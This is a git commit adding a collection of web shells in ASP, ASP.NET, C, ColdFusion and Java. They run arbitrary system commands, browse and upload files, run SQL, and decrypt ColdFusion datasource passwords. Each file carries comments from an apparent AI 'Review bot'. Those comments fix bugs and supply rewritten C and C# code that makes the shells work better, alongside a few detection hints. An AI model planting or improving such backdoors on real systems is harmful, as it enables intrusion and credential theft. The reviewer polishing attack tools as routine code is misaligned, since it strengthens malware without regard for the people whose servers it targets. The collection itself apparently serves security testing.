fzuudb-webshell

This commit is contained in:
tennc 2013-06-05 11:21:04 +08:00
parent 6a88226bfd
commit f06456a918
42 changed files with 5982 additions and 0 deletions


@ -0,0 +1,41 @@
<%
' ASP Cmd Shell On IIS 5.1
' brett.moore_at_security-assessment.com
' http://seclists.org/bugtraq/2006/Dec/0226.html
Dim oS,oSNet,oFSys, oF,szCMD, szTF
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form("C")
If (szCMD <> "") Then
szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
' Here we do the command
Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
"""",0,True)
response.write szTF
' Change perms
Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
everyone:F",0,True)
Set oF = oFSys.OpenTextFile(szTF,1,False,0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="C" size=70 value="<%= szCMD %>">
<input type=submit value="Run"></FORM><PRE>
Machine: <%=oSNet.ComputerName%><BR>
Username: <%=oSNet.UserName%><br>
<%
If (IsObject(oF)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oF.ReadAll)
oF.Close
Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
End If
%>
<!-- http://michaeldaw.org 2006 -->
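Review bot: Lines 25–26 and 29–30 each show one VBScript statement broken across two physical lines with no `_` continuation, so as rendered the two `oS.Run` calls would not parse; I assume this is a wrapping artefact of the page rather than the committed file, but it is worth confirming, since the run line should read `Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & """",0,True)` on a single line. `szCMD` is echoed unencoded into the `value` attribute on line 35 while line 42 already applies `Server.HTMLEncode` to the output; `value="<%= Server.HTMLEncode(szCMD) %>"` keeps the two consistent. From a responder's point of view the durable artefacts are the `cacls ... /E /G everyone:F` ACL change on lines 29–30 and a `pchealth\ERRORREP\QHEADLES\*.tmp` file left behind whenever the `del` on line 44 does not run, both reasonable things to hunt for.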


@ -0,0 +1,47 @@
<!--
ASP_KIT
cmd.asp = Command Execution
by: Maceo
modified: 25/06/2003
-->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = request("cmd")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
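Review bot: `request("cmd")` on line 62 reads from the query string, form and cookies alike, and the form on line 71 submits with GET, so every command lands in the IIS access log as a `cmd=` parameter; that is the first place a responder should look, and it also makes this copy noisier than the `Request.Form` variants elsewhere in this commit. The command text is reflected unencoded into the `value` attribute on line 72 while line 81 encodes the output; `value="<%= Server.HTMLEncode(szCMD) %>"` would match. No `On Error Resume Next` precedes line 65, so a failing `oScript.Run` or `OpenTextFile` surfaces as an ASP error page instead of an empty result, and the `C:\` temp file from line 64 is then never deleted.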


@ -0,0 +1,37 @@
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xcmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","&lt;")
mystring=replace(mystring,">","&gt;")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>
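Review bot: `RunCmd` redirects only standard output (line 100), so anything the program writes to stderr — including `cmd.exe` errors such as "is not recognized" — is silently dropped; adding `myProcessStartInfo.RedirectStandardError = true` and reading `myProcess.StandardError` alongside line 104 would surface it. The manual escaping on lines 107–108 covers `<` and `>` but not `&` or quotes; `Server.HtmlEncode(myString)` is the complete form. `myProcess.Close()` on line 106 releases the handle without `WaitForExit()`, which is usually harmless because `ReadToEnd` drains to EOF, but `Debug="true"` on line 92 turns on verbose ASP.NET error pages that reveal the source path on any exception.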


@ -0,0 +1,55 @@
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
<!-- http://michaeldaw.org 2006 -->


@ -0,0 +1,42 @@
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->
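Review bot: `ExcuteCmd` (lines 186–198) never disposes the `Process` or waits for it, and captures only stdout, so stderr from a failing command is lost; wrapping the process in `using`, setting `psi.RedirectStandardError = true` and calling `p.WaitForExit()` after the read fixes all three, as in the rewrite below. The method name is misspelled (`ExcuteCmd`, and the button label `excute` on line 213); renaming to `ExecuteCmd` is a two-line change I have not made here to keep the interface stable. `Debug="true"` on line 179 enables verbose ASP.NET error pages.
```csharp
string ExcuteCmd(string arg)
{
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = "cmd.exe";
    psi.Arguments = "/c " + arg;
    psi.RedirectStandardOutput = true;
    psi.RedirectStandardError = true;     // errors were previously dropped
    psi.UseShellExecute = false;
    using (Process p = Process.Start(psi))
    {
        string s = p.StandardOutput.ReadToEnd();
        string err = p.StandardError.ReadToEnd();  // fine for small error output; use BeginErrorReadLine for large
        p.WaitForExit();                           // let the child exit before the handle is released
        return s + err;
    }
}
```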


@ -0,0 +1,79 @@
<!--
ASP_KIT
list.asp = Directory & File View
by: darkraver
modified: 16/12/2005
-->
<body>
<html>
<%
file=request("file")
tipo=request("type")
If file="" then
file="c:\"
tipo="1"
End If
%>
<FORM action="" method="GET">
<INPUT TYPE="text" NAME="file" value="<%=file%>">
<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
<INPUT TYPE="submit" Value="Consultar">
</FORM>
<%
If tipo="1" then
Response.Write("<h3>PATH: " & file & "</h3>")
ListFolder(file)
End If
If tipo="2" then
Response.Write("<h3>FILE: " & file & "</h3>")
Set oStr = server.CreateObject("Scripting.FileSystemObject")
Set oFich = oStr.OpenTextFile(file, 1)
Response.Write("<pre>--<br>")
Response.Write(oFich.ReadAll)
Response.Write("<br>--</pre>")
End If
%>
<%
sub ListFolder(path)
set fs = CreateObject("Scripting.FileSystemObject")
set folder = fs.GetFolder(path)
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
for each item in folder.SubFolders
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
next
for each item in folder.Files
Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
next
end sub
%>
</body>
</html>
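Review bot: Line 255 writes the file contents with `Response.Write(oFich.ReadAll)` and no `Server.HTMLEncode`, so any markup or script in the viewed file is rendered by the browser instead of displayed, and the handle is never released (`oFich.Close` after line 255). The parent link on line 263 appends `..\` directly to the current path, so it only resolves when `path` already ends in a backslash — true for paths reached through the links built on line 265, but not for one typed into the form on line 241 without a trailing `\`. `<body>` also precedes `<html>` on lines 230–231.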


@ -0,0 +1,79 @@
<!--
ASP_KIT
list.asp = Directory & File View
by: darkraver
modified: 16/12/2005
-->
<body>
<html>
<%
file=request("file")
tipo=request("type")
If file="" then
file="c:\"
tipo="1"
End If
%>
<FORM action="" method="GET">
<INPUT TYPE="text" NAME="file" value="<%=file%>">
<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
<INPUT TYPE="submit" Value="Consultar">
</FORM>
<%
If tipo="1" then
Response.Write("<h3>PATH: " & file & "</h3>")
ListFolder(file)
End If
If tipo="2" then
Response.Write("<h3>FILE: " & file & "</h3>")
Set oStr = server.CreateObject("Scripting.FileSystemObject")
Set oFich = oStr.OpenTextFile(file, 1)
Response.Write("<pre>--<br>")
Response.Write(oFich.ReadAll)
Response.Write("<br>--</pre>")
End If
%>
<%
sub ListFolder(path)
set fs = CreateObject("Scripting.FileSystemObject")
set folder = fs.GetFolder(path)
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
for each item in folder.SubFolders
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
next
for each item in folder.Files
Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
next
end sub
%>
</body>
</html>
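Review bot: This section is identical to the preceding `list.asp` section (lines 224–273), so the same points apply here: line 309 renders file contents with `Response.Write(oFich.ReadAll)` unencoded and never calls `oFich.Close`, and the `..` link on line 317 only resolves when the current path ends in a backslash. If both copies are intentional (two filenames in the repository), a one-line header comment saying which one is canonical would spare the next reader a diff.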


137
fuzzdb-webshell/asp/up.asp Normal file

@ -0,0 +1,137 @@
<!--
ASP_KIT
up.asp = File upload
by: Unknown
modified: 25/06/2003
-->
<%
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
%>
<%
Response.Buffer = true
Function BuildUpload(RequestBin)
'Get the boundary
PosBeg = 1
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
boundary = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
boundaryPos = InstrB(1,RequestBin,boundary)
'Get all data inside the boundaries
Do until (boundaryPos=InstrB(RequestBin,boundary & getByteString("--")))
'Members variable of objects are put in a dictionary object
Dim UploadControl
Set UploadControl = CreateObject("Scripting.Dictionary")
'Get an object name
Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Disposition"))
Pos = InstrB(Pos,RequestBin,getByteString("name="))
PosBeg = Pos+6
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
Name = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
PosFile = InstrB(BoundaryPos,RequestBin,getByteString("filename="))
PosBound = InstrB(PosEnd,RequestBin,boundary)
'Test if object is of file type
If PosFile<>0 AND (PosFile<PosBound) Then
'Get Filename, content-type and content of file
PosBeg = PosFile + 10
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
FileName = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
'Add filename to dictionary object
UploadControl.Add "FileName", FileName
Pos = InstrB(PosEnd,RequestBin,getByteString("Content-Type:"))
PosBeg = Pos+14
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
'Add content-type to dictionary object
ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
UploadControl.Add "ContentType",ContentType
'Get content of object
PosBeg = PosEnd+4
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
Value = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
Else
'Get content of object
Pos = InstrB(Pos,RequestBin,getByteString(chr(13)))
PosBeg = Pos+4
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
Value = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
End If
UploadControl.Add "Value" , Value
UploadRequest.Add name, UploadControl
BoundaryPos=InstrB(BoundaryPos+LenB(boundary),RequestBin,boundary)
Loop
End Function
%>
<%
Function getByteString(StringStr)
For i = 1 to Len(StringStr)
char = Mid(StringStr,i,1)
getByteString = getByteString & chrB(AscB(char))
Next
End Function
%>
<%
Function getString(StringBin)
getString =""
For intCount = 1 to LenB(StringBin)
getString = getString & chr(AscB(MidB(StringBin,intCount,1)))
Next
End Function
%>
<%
If request("ok")="1" then
Response.Clear
byteCount = Request.TotalBytes
RequestBin = Request.BinaryRead(byteCount)
Set UploadRequest = CreateObject("Scripting.Dictionary")
BuildUpload(RequestBin)
If UploadRequest.Item("fichero").Item("Value") <> "" Then
contentType = UploadRequest.Item("fichero").Item("ContentType")
filepathname = UploadRequest.Item("fichero").Item("FileName")
filename = Right(filepathname,Len(filepathname)-InstrRev(filepathname,"\"))
value = UploadRequest.Item("fichero").Item("Value")
path = UploadRequest.Item("path").Item("Value")
filename = path & filename
Set MyFileObject = Server.CreateObject("Scripting.FileSystemObject")
Set objFile = MyFileObject.CreateTextFile(filename)
For i = 1 to LenB(value)
objFile.Write chr(AscB(MidB(value,i,1)))
Next
objFile.Close
Set objFile = Nothing
Set MyFileObject = Nothing
End If
Set UploadRequest = Nothing
End If
%>
<HTML>
<BODY>
<FORM action="?ok=1" method="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE="file" NAME="fichero">
<INPUT TYPE="submit" Value="Upload">
<br>Target PATH:<br><INPUT TYPE="text" Name="path" Value="C:\">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
File: <%=filename%>
</HTML>
</BODY>
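Review bot: Line 426 joins `path` and `filename` with no separator check, so a target path entered without a trailing backslash (e.g. `C:\inetpub`) writes to `C:\inetpubfile.ext`; `If Right(path, 1) <> "\" Then path = path & "\"` before line 426 fixes it. The file is written through `CreateTextFile` one `chr(AscB(...))` at a time (lines 428–431), which goes through the ANSI code page and is likely to corrupt binary uploads — an `ADODB.Stream` opened in binary mode is the usual replacement, though I have not verified this on a target IIS build. The closing `</HTML>` and `</BODY>` on lines 450–451 are also in the wrong order.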

74
fuzzdb-webshell/c/cmd.c Normal file

@ -0,0 +1,74 @@
//
// cmdcgi.exe 0.1 darkraver (12/05/2005)
//
#include <stdio.h>
char *uri_decode(char *uri) {
int i=0;
int ptr=0;
char *command;
char hexa[3];
char code;
command=(char *)malloc(strlen(uri));
for(i=0;i<strlen(uri);i++) {
switch(*(uri+i)) {
case '+':
*(command+ptr)=' ';
ptr++;
break;
case '%':
sprintf(hexa, "%c%c\x00", *(uri+i+1), *(uri+i+2));
i+=2;
//printf("HEXA: %s\n", hexa);
sscanf(hexa, "%x", &code);
//printf("CODE: %c\n", code);
*(command+ptr)=code;
ptr++;
break;
default:
*(command+ptr)=*(uri+i);
ptr++;
break;
}
}
*(command+ptr)='\0';
return command;
}
int main(int argc, char **argv) {
char *cmd;
printf("Content-type: text/html\n\n");
printf("<html><body>\n");
cmd=(char *)getenv("QUERY_STRING");
if(!cmd || strlen(cmd)==0) {
printf("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
printf("<input type=\"text\" name=\"cmd\">");
printf("<input type=\"submit\" value=\"Send\">");
printf("<br><br><hr></form>");
} else {
//printf("QUERY_STRING: %s\n", cmd);
cmd+=4;
cmd=uri_decode(cmd);
printf("<hr><p><b>COMMAND: %s</b><br><br><hr><pre>\n", cmd);
fflush(stdout);
execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
}
}
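Review bot: `uri_decode` has two memory-safety bugs: line 468 allocates `strlen(uri)` bytes but line 490 writes the terminator at index `ptr`, which equals `strlen(uri)` whenever the input contains no `%` escape, so the NUL lands one byte past the heap block; and line 479 has `sscanf("%x")` store an `unsigned int` into the single-byte `code`, overwriting adjacent stack. Line 505 also skips four characters unconditionally, assuming the query string starts with `cmd=`, and line 509 passes `0` rather than `(char *)NULL` as the `execl` terminator. The listing needs `<stdlib.h>`, `<string.h>` and `<unistd.h>` for `malloc`, `strlen`/`strncmp` and `execl`. A rewrite of the decoder and of the query-string branch follows; the HTML emitted by `main` is unchanged.
```c
// … unchanged: includes (add <stdlib.h>, <string.h>, <unistd.h>) …
char *uri_decode(const char *uri) {
    size_t len = strlen(uri);
    char *command = malloc(len + 1);          /* +1: room for the terminator */
    if (command == NULL) return NULL;
    size_t ptr = 0;
    for (size_t i = 0; i < len; i++) {
        if (uri[i] == '+') {
            command[ptr++] = ' ';
        } else if (uri[i] == '%' && i + 2 < len) {
            char hexa[3] = { uri[i + 1], uri[i + 2], '\0' };
            unsigned int code = 0;            /* full int: %x writes sizeof(int) bytes */
            if (sscanf(hexa, "%x", &code) == 1) {
                command[ptr++] = (char)code;
                i += 2;
            } else {
                command[ptr++] = uri[i];      /* not a valid escape: copy literally */
            }
        } else {
            command[ptr++] = uri[i];
        }
    }
    command[ptr] = '\0';
    return command;
}
// … unchanged: main() header output and the empty-form branch …
    } else {
        if (strncmp(cmd, "cmd=", 4) != 0) return 1;   /* was: unconditional cmd += 4 */
        cmd = uri_decode(cmd + 4);
        if (cmd == NULL) return 1;
        printf("<hr><p><b>COMMAND: %s</b><br><br><hr><pre>\n", cmd);
        fflush(stdout);
        execl("/bin/sh", "/bin/sh", "-c", cmd, (char *)NULL);
    }
```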


@ -0,0 +1,77 @@
<html>
<body>
<!-- orig author: kGrutzmacher -->
<!-- additshonz: lawKnee -->
<b>Notes:</b><br>
<ul>
<li>For Windows put this as command "c:\windows\system32\cmd.exe /c" or wherever cmd.exe is<br>
<li>For Windows options are the command you want to run "dir" "type" etc
</ul>
<p>
<cfoutput>
<table>
<form method="POST" action="">
<tr><td>Command:</td><td><input type=text name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse>value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</form>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#HTMLCodeFormat(myVar)#
</pre>
</cfif>
<cfscript>
//The following code borrowed from hernanOchoa @hexale (thx)
//added better formatting on output and connection string [lb]
// Create Data Source Object
dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
getDatasourceService().getDatasources();
writeoutput("<br><br><b>Datasource Credentials:</b><br>");
writeoutput("<table>");
// Loop Through DataSources
for(i in dataSourceObb) {
if(len(dataSourceObb[i]["password"])){
// Get url
theurl=(dataSourceObb[i]["url"]);
// Get username
username=(dataSourceObb[i]["username"]);
// Get and decrypt password
decryptPassword=Decrypt(dataSourceObb[i]["password"],
generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
"Base64");
// Output datasource usernames, passwords, and urls
writeoutput("" &
"<tr><td>DataSource: " & i & "</td>" &
"<td>Username: " & username & "</td>" &
"<td>Password: " & decryptPassword &
"<td>URL: " & theurl & "</td></tr>");
}
}
writeoutput("</table><br>");
</cfscript>
</cfoutput>
</body>
</html>
<!-- orig from mDaw bdoor -->
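Review bot: The datasource dump on lines 550–578 runs on every request, including the initial GET, and is not wrapped in any error handling, so on an instance where `coldfusion.server.ServiceFactory` is not reachable from CFML (the sibling `foldFusion` page notes it expects CF8 or unpatched CF9) the whole page errors before the command form is usable; wrapping that `<cfscript>` block in `<cftry>`/`<cfcatch type="any">` keeps the exec half working. Lines 530, 532 and 534 reflect `form.cmd`, `form.opts` and `form.timeout` into attribute values without `HTMLEditFormat()`, and lines 570–574 write the recovered usernames, passwords and URLs unencoded too, unlike the `HTMLCodeFormat` applied on line 547. For detection purposes, the `ServiceFactory` lookup on line 554 and the literal 3DES seed string on line 567 are stable, greppable markers of this page.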


@ -0,0 +1,64 @@
<!-- foldFusion page by lawKnee -->
<!-- useful when you can upload cfm and would like to talk to all db's avail -->
<!-- but dont want to (or can't) connect from the OS -->
<!-- this page uses ServiceFactory to auto-enum all datasources on the instance -->
<!-- only works on CF8 and below, but unpatched CF9 should work too -->
<html>
<body>
<p><b>Notes:</b></p>
<ul>
<li>Select the database you want to use</li>
<li>Write SQL statements in the text box</li>
</ul>
<form method="POST" action="">
<p><b>SQL Interface:</b></p>
Datasource<br>
<select name="datasource">
<cfscript>
dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
getDatasourceService().getDatasources();
for(i in dataSourceObb) {
writeoutput('<option value="' & i & '">' & i & '</option>');
}
</cfscript>
</select>
<br>
SQL<br>
<textarea name="sql" rows="5" cols="100"></textarea>
<br>
<input type=submit value="Exec">
</form>
<cfif isdefined("form.sql")>
<cfquery name="runsql" datasource="#Form.datasource#" timeout="30">
#Form.sql#
</cfquery>
</cfif>
<table border=1>
<cfif isdefined("form.sql")>
<cfloop from="0" to="#runsql.RecordCount#" index="row">
<cfif row eq 0>
<tr>
<cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
<th><cfoutput>#column#</cfoutput></th>
</cfloop>
</tr>
<cfelse>
<tr>
<cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
<td><cfoutput>#runsql[column][row]#</cfoutput></td>
</cfloop>
</tr>
</cfif>
</cfloop>
</cfif>
</table>
</body>
</html>
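Review bot: Line 624 reads `runsql.RecordCount` whenever `form.sql` is defined, but a statement that returns no result set (an `UPDATE`, `INSERT` or DDL) does not, as far as I recall, populate the `name`d query variable, so the loop throws after the statement has already run; guarding with `<cfif isdefined("form.sql") and isdefined("runsql")>` on line 623 avoids that. Cell values on line 634 and datasource names on line 607 are output without `HTMLEditFormat()`, so markup stored in a column is rendered rather than shown. The header/body split on lines 625–631 uses row 0 as a sentinel, which works because CF query rows are 1-based; a one-line comment saying so would help the next reader.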


@ -0,0 +1,32 @@
<html>
<body>
<cfoutput>
<table>
<form method="POST" action="">
<tr>
<td>Command:</td>
<td> < input type=text name="cmd" size=50<cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td>
</tr>
<tr>
<td>Options:</td>
<td> < input type=text name="opts" size=50 <cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
</tr>
<tr>
<td>Timeout:</td>
<td>< input type=text name="timeout" size=4 <cfif isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5" </cfif> > </td>
</tr>
</table>
<input type=submit value="Exec" >
</FORM>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>
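Review bot: The `<cfexecute>` on line 668 runs unconditionally, so the very first GET — before `Form.cmd` exists — throws an undefined-variable error instead of rendering the form; the fuller copy earlier in this commit wraps it in `<cfif isdefined("form.cmd")>`, and this one should do the same. The `< input` and `< br` on lines 654, 658 and 662 have a space after `<`, which browsers treat as text rather than a tag, so the form fields never render; remove the spaces. Line 672 outputs `#myVar#` raw, whereas the other copy uses `#HTMLCodeFormat(myVar)#`.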



@ -0,0 +1,43 @@
/*
* CmdServlet.java 20/01/2004
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class CmdServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
out.print("<input type=\"text\" name=\"cmd\">");
out.print("<input type=\"submit\" value=\"Send\">");
out.print("</form>");
if(req.getParameter("cmd") != null) {
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
DataInputStream procIn = new DataInputStream(p.getInputStream());
int c='\0';
while ((c=procIn.read()) != -1) {
out.print((char)c);
}
}
out.print("\n<hr></pre>");
out.print("</body></html>");
}
public String getServletInfo() {
return "CmdServlet 0.1";
}
}
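Review bot: `doGet` reads only `p.getInputStream()` (line 704), so stderr from the spawned `cmd /c` is never shown and, if the child writes enough of it to fill the pipe, the child blocks; building the process with `new ProcessBuilder("cmd", "/c", cmd).redirectErrorStream(true)` merges the two streams, or drain `p.getErrorStream()` separately. The byte-to-`char` cast on line 707 mangles any non-ASCII output — wrap the stream in an `InputStreamReader` instead. Line 702 reflects the `cmd` parameter into the page unencoded, and because the form on line 697 uses GET every command is also recorded verbatim in the container's access log, which is the quickest place to reconstruct what was run.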



@ -0,0 +1,86 @@
/*
* ListServlet.java
*
* @author Sierra
* @version 0.1
*/
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
public class ListServlet extends HttpServlet
{
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
PrintWriter printwriter = res.getWriter();
String path = req.getParameter("file");
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
if(req.getParameter("file")==null) path = "c:\\";
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
File file = new File(path);
if(file.isDirectory())
{
String s = new String("Unknown");
String s2 = new String("Black");
File afile[] = file.listFiles();
for(int i = 0; i < afile.length; i++)
{
String s1 = new String(afile[i].toString());
printwriter.write("(");
String s3;
if(afile[i].isDirectory())
{
printwriter.write("d");
s1 = s1 + "/";
s3 = new String("Blue");
} else
if(afile[i].isFile())
{
printwriter.write("-");
s3 = new String("Green");
} else
{
printwriter.write("?");
s3 = new String("Red");
}
if(afile[i].canRead())
printwriter.write("r");
else
printwriter.write("-");
if(afile[i].canWrite())
printwriter.write("w");
else
printwriter.write("-");
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
}
printwriter.write("<hr></FONT></BODY></HTML>");
} else
if(file.canRead())
{
FileInputStream fileinputstream = new FileInputStream(file);
int j = 0;
while(j >= 0)
{
j = fileinputstream.read();
printwriter.write(j);
}
fileinputstream.close();
} else
{
printwriter.write("Can't Read file<BR>");
}
}
public String getServletInfo() {
return "Directory Listing";
}
}
